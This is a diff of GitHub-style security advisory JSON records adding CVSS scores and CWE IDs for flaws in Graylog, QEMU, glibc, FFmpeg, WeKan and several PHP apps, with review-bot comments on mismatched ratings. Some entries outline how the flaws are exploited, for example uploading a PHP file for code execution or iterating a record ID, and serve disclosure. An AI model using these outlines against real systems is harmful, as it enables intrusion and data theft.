@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-49xw-73mm-8fw9", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1439" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/\n\nalerts\n\n/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json b/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json new file mode 100644 index 0000000000000..a1b59ad0595c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pq4-6gr5-cr69", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-0665" + ], + "details": "An off-by-one error was found in QEMU's KVM Xen guest support. A malicious guest could use this flaw to trigger out-of-bounds heap accesses in the QEMU process via the emulated Xen physdev hypercall interface, leading to a denial of service or potential memory corruption.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0665" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-0665" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428640" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json index 5f43ff3dcbfb9..da562ffae87ff 100644 --- a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json +++ b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-55vh-w3p8-qq9g", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70141" ], "details": "SourceCodester Customer Support System 1.0 contains an incorrect access control vulnerability in ajax.php. The AJAX dispatcher does not enforce authentication or authorization before invoking administrative methods in admin_class.php based on the action parameter. An unauthenticated remote attacker can perform sensitive operations such as creating customers and deleting users (including the admin account), as well as modifying or deleting other application records (tickets, departments, comments), resulting in unauthorized data modification.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json index 57e5554fcf326..b3abdac0e1d53 100644 --- a/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json +++ b/advisories/unreviewed/2026/02/GHSA-5hp8-hwcv-h225/GHSA-5hp8-hwcv-h225.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5hp8-hwcv-h225", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1437" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the '/system/authentication/users/edit/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json index 89bf8cfaa988e..2a4bc316e8b57 100644 --- a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json +++ b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5pqm-c33h-22jc", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70146" ], "details": "Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json b/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json index 8d39404dbb3f4..fe04198c2c7f8 100644 --- a/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json +++ b/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-62j7-j842-x6r6", - "modified": "2026-02-08T00:30:59Z", + "modified": "2026-02-18T21:31:18Z", "published": "2026-02-08T00:30:59Z", "aliases": [ "CVE-2026-25566" ], "details": "WeKan versions prior to 8.19 contain an authorization vulnerability in card move logic. A user can specify a destination board/list/swimlane without adequate authorization checks for the destination and without validating that destination objects belong to the destination board, potentially enabling unauthorized cross-board moves.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json b/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json new file mode 100644 index 0000000000000..57e23d8b5df16 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json 
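Review bot: The added `CVSS_V3` entry for GHSA-62j7-j842-x6r6 rates integrity impact as low (`I:L`), while the `CVSS_V4` entry kept next to it rates it high (`VI:H`), so the record now carries two disagreeing impact ratings for the same WeKan card-move authorization flaw. Triage tooling that prefers one vector type over the other will rank this advisory differently. The two vectors presumably come from different assessors, so the integrity metric should be reconciled against the upstream CVE-2026-25566 record. If the V4 assessment is the one that holds, the V3 line would read `"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"`.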
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qhw-4fcq-2g37", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-0577" + ], + "details": "An insufficient entropy vulnerability was found in glibc. The getrandom and arc4random family of functions may return predictable randomness if these functions are called again after the fork, which happens concurrently with a call to any of these functions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0577" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-0577" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338871" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-331" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json b/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json index afb076718911f..3ca5dad8bd323 100644 --- a/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json +++ b/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json b/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json index 194cd692c6897..579a50df4db1c 100644 --- a/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json +++ b/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json 
@@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json b/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json new file mode 100644 index 0000000000000..6b41a654786b3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gfj-223w-87pr", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70063" + ], + "details": "The 'Medical History' module in PHPGurukul Hospital Management System v4.0 contains an Insecure Direct Object Reference (IDOR) vulnerability. The application fails to verify that the requested 'viewid' parameter belongs to the currently authenticated patient. This allows a user to access the confidential medical records of other patients by iterating the 'viewid' integer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70063" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/f43c7eca5048152899e14412523afe80" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json index ecca6b38fb478..0dc8672161cf7 100644 --- a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json 
+++ b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8rqj-9226-cwx7", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70151" ], "details": "code-projects Scholars Tracking System 1.0 allows an authenticated attacker to achieve remote code execution via unrestricted file upload. The endpoints update_profile_picture.php and upload_picture.php store uploaded files in a web-accessible uploads/ directory using the original, user-supplied filename without validating the file type or extension. By uploading a PHP file and then requesting it from /uploads/, an attacker can execute arbitrary PHP code as the web server user.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T18:24:20Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json b/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json new file mode 100644 index 0000000000000..3fa55c8e2dcc7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json 
@@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9f49-2j27-6f79", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1200" + ], + "details": "A flaw was found in the rgaufman/live555 fork of live555. A remote attacker could exploit a segmentation fault, in the `increaseBufferTo` function. This vulnerability can lead to memory corruption problems and potentially other consequences.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1200" + }, + { + "type": "WEB", + "url": "https://github.com/rgaufman/live555/issues/65" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-1200" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430836" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-824" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json b/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json index 47be1da9b23a1..30dbe19657616 100644 --- a/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json +++ b/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json b/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json new file mode 100644 index 0000000000000..db2e0d8360e62 --- /dev/null 
+++ b/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c96q-rf2r-2xj8", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-10256" + ], + "details": "A NULL pointer dereference vulnerability exists in FFmpeg’s Firequalizer filter (libavfilter/af_firequalizer.c) due to a missing check on the return value of av_malloc_array() in the config_input() function. An attacker could exploit this by tricking a victim into processing a crafted media file with the Firequalizer filter enabled, causing the application to dereference a NULL pointer and crash, leading to denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10256" + }, + { + "type": "WEB", + "url": "https://github.com/FFmpeg/FFmpeg/commit/a25462482c02c004d685a8fcf2fa63955aaa0931" + }, + { + "type": "WEB", + "url": "https://github.com/FFmpeg/FFmpeg/commit/d3be186ed1bcdcf2c093d6b13a0e66dc5132be2a" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-10256" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394495" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json index 2120594c9543c..95f34df76cffa 100644 --- a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json +++ b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json 
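Review bot: The `CVSS_V3` vector in the new GHSA-c96q-rf2r-2xj8 record uses `UI:N`, but its `details` text says the attacker must trick a victim into processing a crafted media file with the Firequalizer filter enabled, which reads as required user interaction. If the description is accurate, the vector would be `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L`. If unattended server-side processing of untrusted media is the intended scenario, the description should say so, because defenders scoping exposure need to know which deployment is meant.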
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cf26-rj67-f4wr", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1441" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/index_sets/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json new file mode 100644 index 0000000000000..882b4cca10a17 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cq5p-w4x6-m6h3", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-2660" + ], + "details": "A vulnerability was identified in FascinatedBox lily up to 2.3. Affected by this issue is the function shorthash_for_name of the file src/lily_symtab.c. The manipulation leads to use after free. Local access is required to approach this attack. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2660" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily/issues/385" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i385/repro.lily" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753164" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json index 4721f7998d570..23ea9e8a19226 100644 
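Review bot: `cwe_ids` in the new GHSA-cq5p-w4x6-m6h3 record lists only `"CWE-119"`, although `details` names the flaw as a use after free in `shorthash_for_name`; the specific class would be `"CWE-416"`. The new GHSA-gwrh-w4f9-ffc9 record has the same gap: it describes an unrestricted upload but carries only `"CWE-284"`, whereas this same sync uses `"CWE-434"` for the upload flaw in GHSA-8rqj-9226-cwx7. Other hunks here keep the broad class and append the specific one (`"CWE-119", "CWE-787"` in GHSA-844q-r72x-vfmv), and that pattern would fit both records. Filters and detection mappings keyed on CWE will miss entries that carry only the parent class.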
--- a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json +++ b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cw7v-qx8m-563q", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1438" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/nodes/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json index 36804edf5a62e..e433a13645a70 100644 --- a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json +++ b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ff7j-jwgr-hgxp", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1436" ], "details": "Improper Access Control (IDOR) in the Graylog API, version 2.2.3, which occurs when modifying the user ID in the URL. An authenticated user can access other user's profiles without proper authorization checks. Exploiting this vulnerability allows valid users of the system to be listed and sensitive third-party information to be accessed, such as names, email addresses, internal identifiers, and last activity. The endpoint 'http://:12900/users/' does not implement object-level authorization validations.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json b/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json new file mode 100644 index 0000000000000..eb06a5878846a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq25-pccv-6q8j", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-14876" + ], + "details": "A flaw was found in the virtio-crypto device of QEMU. A malicious guest operating system can exploit a missing length limit in the AKCIPHER path, leading to uncontrolled memory allocation. This can result in a denial of service (DoS) on the host system by causing the QEMU process to terminate unexpectedly.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14876" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14876" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423549" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json b/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json new file mode 100644 index 0000000000000..6c56fdd48486d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json 
